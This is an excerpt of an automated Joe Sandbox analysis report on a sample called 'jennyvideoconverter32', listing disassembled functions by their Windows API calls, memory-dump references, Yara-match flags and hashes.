                                                                            • Instruction Fuzzy Hash: B0900260685101EAE2208B72590C3192555A55864171148795803E0251D7398011556D
                                                                            APIs
                                                                            • CreateServiceA.ADVAPI32 ref: 004025C0
                                                                            • CloseServiceHandle.ADVAPI32(?), ref: 0040B142
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040BA6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$Create
                                                                            • String ID:
                                                                            • API String ID: 2095555506-0
                                                                            • Opcode ID: e858b8e07da31aaea066bf320dab7e10ba7e73c670a0c99565c3beb8301389e5
                                                                            • Instruction ID: 2c57a793267860c8416b62d0af7600b6947d569aa6da246257328b76db486df6
                                                                            • Opcode Fuzzy Hash: e858b8e07da31aaea066bf320dab7e10ba7e73c670a0c99565c3beb8301389e5
                                                                            • Instruction Fuzzy Hash: C3F0EC70484141EBD7218FA4CE8899A3F71EA1235172100A2E9427A1D1C73A9F43FF9E
                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02E308E2
                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02E308EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                            • Instruction ID: 4bb9bb500dd1dd8e9bcb597572ee2635f152106883dd253530bc444fc556b953
                                                                            • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                            • Instruction Fuzzy Hash: EFF09A30248341CFEB25CE25C851B2EBBE4ABDC759F50492CF596A2191D370E181CB6A
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02E34DD6,?,?,?,00000001), ref: 02E3946D
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02E39476
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 836cf845b65b4e874cf1d0745330ebe0140f97b512da1f36dffd7d4fc9ee12e4
                                                                            • Instruction ID: 1cfb1f82dd2320fd62ea0db604a5eda35f020bcff67642990488daefe76a3698
                                                                            • Opcode Fuzzy Hash: 836cf845b65b4e874cf1d0745330ebe0140f97b512da1f36dffd7d4fc9ee12e4
                                                                            • Instruction Fuzzy Hash: 7EB092394C6208EBCB012B92FC09B89BFA9EB04662F804C10F60D440508B6274A29AE1
                                                                            APIs
                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040BA56
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlDispatcherServiceStart
                                                                            • String ID:
                                                                            • API String ID: 3789849863-0
                                                                            • Opcode ID: cd3fc729cc565af5f9e19fa13f89f3738964cccb76ec011b9c8ebaf89f6a96f8
                                                                            • Instruction ID: ff38cc132043d6f24fa157630e334457b3b30a3b0b276be37ad55199a0acdf12
                                                                            • Opcode Fuzzy Hash: cd3fc729cc565af5f9e19fa13f89f3738964cccb76ec011b9c8ebaf89f6a96f8
                                                                            • Instruction Fuzzy Hash: 1EE04F6080D281FFDB11D76049949B97B74EB1A351B2554E7D043B66D2C37C0E07EBAE
                                                                            APIs
                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040BA56
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlDispatcherServiceStart
                                                                            • String ID:
                                                                            • API String ID: 3789849863-0
                                                                            • Opcode ID: 542f690ebdc7cf5ea0e643997ca8341dd1f2790eaeb0af7154466a56b3dce7f6
                                                                            • Instruction ID: 8ee052c53226da038e4bd59659a46a9804a398483d7e4a99f38ce6736202652f
                                                                            • Opcode Fuzzy Hash: 542f690ebdc7cf5ea0e643997ca8341dd1f2790eaeb0af7154466a56b3dce7f6
                                                                            • Instruction Fuzzy Hash: 33E08C719086428FD701876088AD6A8BBA4EE0636131645A28843A6592D7388A4B9B9E
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E224E6
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02E224FC
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E2250E
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E2256D
                                                                            • SetLastError.KERNEL32(00000000,?,771ADFB0), ref: 02E2257F
                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,771ADFB0), ref: 02E22599
                                                                            • GetLastError.KERNEL32(?,771ADFB0), ref: 02E225A2
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02E225F0
                                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 02E2262F
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02E2268E
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E22699
                                                                            • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02E226AD
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,771ADFB0), ref: 02E226BD
                                                                            • GetLastError.KERNEL32(?,771ADFB0), ref: 02E226C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                            • String ID:
                                                                            • API String ID: 1213838671-0
                                                                            • Opcode ID: 74f33635058c203614ef26d2998622d1216001e9e97383fc25ba91d774970f17
                                                                            • Instruction ID: ab8418c7cbfc76374be3b75db31d688fdfee411f1410a2ee2aedd66e71603e57
                                                                            • Opcode Fuzzy Hash: 74f33635058c203614ef26d2998622d1216001e9e97383fc25ba91d774970f17
                                                                            • Instruction Fuzzy Hash: A86150719812199FCB10DFA5D584AAEFBF9FF08314F509929E946E3240D734A949CFA0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E24608
                                                                              • Part of subcall function 02E33A8F: _malloc.LIBCMT ref: 02E33AA7
                                                                            • htons.WS2_32(?), ref: 02E24669
                                                                            • htonl.WS2_32(?), ref: 02E2468C
                                                                            • htonl.WS2_32(00000000), ref: 02E24693
                                                                            • htons.WS2_32(00000000), ref: 02E24747
                                                                            • _sprintf.LIBCMT ref: 02E2475D
                                                                              • Part of subcall function 02E288BF: _memmove.LIBCMT ref: 02E288DF
                                                                            • htons.WS2_32(?), ref: 02E246B0
                                                                              • Part of subcall function 02E2966A: __EH_prolog.LIBCMT ref: 02E2966F
                                                                              • Part of subcall function 02E2966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02E296EA
                                                                              • Part of subcall function 02E2966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02E29708
                                                                              • Part of subcall function 02E21BA7: __EH_prolog.LIBCMT ref: 02E21BAC
                                                                              • Part of subcall function 02E21BA7: RtlEnterCriticalSection.NTDLL ref: 02E21BBC
                                                                              • Part of subcall function 02E21BA7: RtlLeaveCriticalSection.NTDLL ref: 02E21BEA
                                                                              • Part of subcall function 02E21BA7: RtlEnterCriticalSection.NTDLL ref: 02E21C13
                                                                              • Part of subcall function 02E21BA7: RtlLeaveCriticalSection.NTDLL ref: 02E21C56
                                                                              • Part of subcall function 02E2DE26: __EH_prolog.LIBCMT ref: 02E2DE2B
                                                                            • htonl.WS2_32(?), ref: 02E2497C
                                                                            • htonl.WS2_32(00000000), ref: 02E24983
                                                                            • htonl.WS2_32(00000000), ref: 02E249C8
                                                                            • htonl.WS2_32(00000000), ref: 02E249CF
                                                                            • htons.WS2_32(?), ref: 02E249EF
                                                                            • htons.WS2_32(?), ref: 02E249F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                            • String ID:
                                                                            • API String ID: 1645262487-0
                                                                            • Opcode ID: f553cfd01282c45df3433339f9f6a5ead1ff380918d2af1b62d0e9660ef4227b
                                                                            • Instruction ID: 65cfff1a28297659ba76f4c571b275e4d891c594f2475953133b9eeb17b0638e
                                                                            • Opcode Fuzzy Hash: f553cfd01282c45df3433339f9f6a5ead1ff380918d2af1b62d0e9660ef4227b
                                                                            • Instruction Fuzzy Hash: 38023B71C40269DFDF15DFA4D844BEEBBB9AF08304F10915AE506B7280DB745A89CFA1
                                                                            APIs
                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(ET Ammeter Side 10.7.46,Function_0000235E), ref: 004023C1
                                                                            • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                            • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                            • SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA
                                                                            Strings
                                                                            • ET Ammeter Side 10.7.46, xrefs: 004023BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                            • String ID: ET Ammeter Side 10.7.46
                                                                            • API String ID: 3346042915-298150824
                                                                            • Opcode ID: 753c8bccf627cb5353d4a294398c8736193124083ae435b11ee25f47cab8285e
                                                                            • Instruction ID: 1420ef795783f2c616889eaeaacfbb85f42c25b2a6fdf7f0143c9c805b11b94c
                                                                            • Opcode Fuzzy Hash: 753c8bccf627cb5353d4a294398c8736193124083ae435b11ee25f47cab8285e
                                                                            • Instruction Fuzzy Hash: D4210C70441309EBD210DF16EF49E567FB8EB85754711C03BE206B22B0D7BA0064EB6E
                                                                            APIs
                                                                            • RtlDecodePointer.NTDLL(?), ref: 02E3827A
                                                                            • _free.LIBCMT ref: 02E38293
                                                                              • Part of subcall function 02E32EB4: HeapFree.KERNEL32(00000000,00000000,?,02E35C12,00000000,00000104,771B0A60), ref: 02E32EC8
                                                                              • Part of subcall function 02E32EB4: GetLastError.KERNEL32(00000000,?,02E35C12,00000000,00000104,771B0A60), ref: 02E32EDA
                                                                            • _free.LIBCMT ref: 02E382A6
                                                                            • _free.LIBCMT ref: 02E382C4
                                                                            • _free.LIBCMT ref: 02E382D6
                                                                            • _free.LIBCMT ref: 02E382E7
                                                                            • _free.LIBCMT ref: 02E382F2
                                                                            • _free.LIBCMT ref: 02E38316
                                                                            • RtlEncodePointer.NTDLL(00AEEAD0), ref: 02E3831D
                                                                            • _free.LIBCMT ref: 02E38332
                                                                            • _free.LIBCMT ref: 02E38348
                                                                            • _free.LIBCMT ref: 02E38370
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 3064303923-0
                                                                            • Opcode ID: 8497bb97e1c2a2217c7a03b1beb230a8737154bf44ef7f2ea27a9625ca273f1c
                                                                            • Instruction ID: f882bd3cad8c1a322e67c02a86d6913c3592616d4ec6be36265c8ccc2911ca01
                                                                            • Opcode Fuzzy Hash: 8497bb97e1c2a2217c7a03b1beb230a8737154bf44ef7f2ea27a9625ca273f1c
                                                                            • Instruction Fuzzy Hash: 51218D32CD5320CBCA2BAF17A84851A77A9AF0576A389992AFD4457340C7369CA1CF90
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                            • String ID: -@
                                                                            • API String ID: 1823725401-2999422947
                                                                            • Opcode ID: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                                            • Instruction ID: a052efc5f8264b04540ba139265ff63877c4dc4e75c0ae38b6650f7b3518fcca
                                                                            • Opcode Fuzzy Hash: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                                            • Instruction Fuzzy Hash: 7A31F0B24042217EDB303F785C8883B7E9CE64574A7120D3BF542E3390E67A8E814AAD
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E23428
                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02E2346B
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02E23472
                                                                            • GetLastError.KERNEL32 ref: 02E23486
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02E234D7
                                                                            • RtlEnterCriticalSection.NTDLL(00000018), ref: 02E234ED
                                                                            • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02E23518
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                            • String ID: CancelIoEx$KERNEL32
                                                                            • API String ID: 2902213904-434325024
                                                                            • Opcode ID: 7b54c9e2da6d65b99df2a23383f272a836d847e6897f2a844a5e910a4370a123
                                                                            • Instruction ID: 81b3bb5311755f5d358b0d0725fb96300c01bc6317cb9e6a5335e269c5ab85a3
                                                                            • Opcode Fuzzy Hash: 7b54c9e2da6d65b99df2a23383f272a836d847e6897f2a844a5e910a4370a123
                                                                            • Instruction Fuzzy Hash: F731B0B5980225DFDB11DF64D844AAABBF9FF48315F00D89AE81A9B340CB74D905CFA1
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                            • API String ID: 2238633743-4073082454
                                                                            • Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                            • Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
                                                                            • Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                            • Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                                            • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                                            • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleModuleNameWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
                                                                            • API String ID: 3784150691-1191147370
                                                                            • Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                            • Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
                                                                            • Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                            • Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59
                                                                            APIs
                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                                            • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                                            • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: String$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 352835431-0
                                                                            • Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                            • Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
                                                                            • Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                            • Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                                            APIs
                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,83812041), ref: 02E315F0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E31605
                                                                            • ResetEvent.KERNEL32(00000000,83812041), ref: 02E3160F
                                                                            • CloseHandle.KERNEL32(00000000,83812041), ref: 02E31644
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,83812041), ref: 02E316BA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E316CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$CreateOpenReset
                                                                            • String ID:
                                                                            • API String ID: 1285874450-0
                                                                            • Opcode ID: bfb091f62965c2b6b286ca809e96d5b66daf2c1f380ab606eadd7050749b147b
                                                                            • Instruction ID: 608c03b5ec136dd863c4cc5dfe8abc97196e850d1d18013ca5596b544717b3fc
                                                                            • Opcode Fuzzy Hash: bfb091f62965c2b6b286ca809e96d5b66daf2c1f380ab606eadd7050749b147b
                                                                            • Instruction Fuzzy Hash: D2415F71D84358ABDF21CFE5C848BADBBB8AF05729F14861DE419EB280D7309905CB90
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02E220AC
                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02E220CD
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E220D8
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02E2213E
                                                                            • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02E2217A
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02E22187
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E221A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                            • String ID:
                                                                            • API String ID: 1171374749-0
                                                                            • Opcode ID: e434a01b4fd1c73de5bcc9c9adc581763e20965aae1bf2b42cf71037a1b1dc34
                                                                            • Instruction ID: 42d0726acd41991ad36b4a61e9b4ac5340bf42a4b934e51bc6aeb35ed5008bd8
                                                                            • Opcode Fuzzy Hash: e434a01b4fd1c73de5bcc9c9adc581763e20965aae1bf2b42cf71037a1b1dc34
                                                                            • Instruction Fuzzy Hash: 4D4139755847119FC321DF26D884E6BBBF9FFC8654F004A1EB99682250D730E54ACFA2
                                                                            APIs
                                                                              • Part of subcall function 02E31E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02E3166E,?,?), ref: 02E31E3F
                                                                              • Part of subcall function 02E31E10: CloseHandle.KERNEL32(00000000,?,?,02E3166E,?,?), ref: 02E31E54
                                                                              • Part of subcall function 02E31E10: SetEvent.KERNEL32(00000000,02E3166E,?,?), ref: 02E31E67
                                                                            • OpenEventA.KERNEL32(00100002,00000000,00000000,83812041), ref: 02E315F0
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E31605
                                                                            • ResetEvent.KERNEL32(00000000,83812041), ref: 02E3160F
                                                                            • CloseHandle.KERNEL32(00000000,83812041), ref: 02E31644
                                                                            • __CxxThrowException@8.LIBCMT ref: 02E31675
                                                                              • Part of subcall function 02E3449A: RaiseException.KERNEL32(?,?,02E2FA92,?,?,?,?,?,?,?,02E2FA92,?,02E50F78,?), ref: 02E344EF
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,83812041), ref: 02E316BA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E316CF
                                                                              • Part of subcall function 02E31B50: GetCurrentProcessId.KERNEL32(?), ref: 02E31BA9
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,83812041), ref: 02E316DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                            • String ID:
                                                                            • API String ID: 2227236058-0
                                                                            • Opcode ID: 017b124d6f58fa2af4ae4901214bba4e1377ef31c153152fee6914035b6efe04
                                                                            • Instruction ID: 8adb659668db20b46f3a20cb2613c28d0dffa848793a2fcd119db098884a997b
                                                                            • Opcode Fuzzy Hash: 017b124d6f58fa2af4ae4901214bba4e1377ef31c153152fee6914035b6efe04
                                                                            • Instruction Fuzzy Hash: 5A315F71D843089BDF22CBE5CC48BADB7B9AF0531AF18912DE81DEB280D7219905CB51
                                                                            APIs
                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
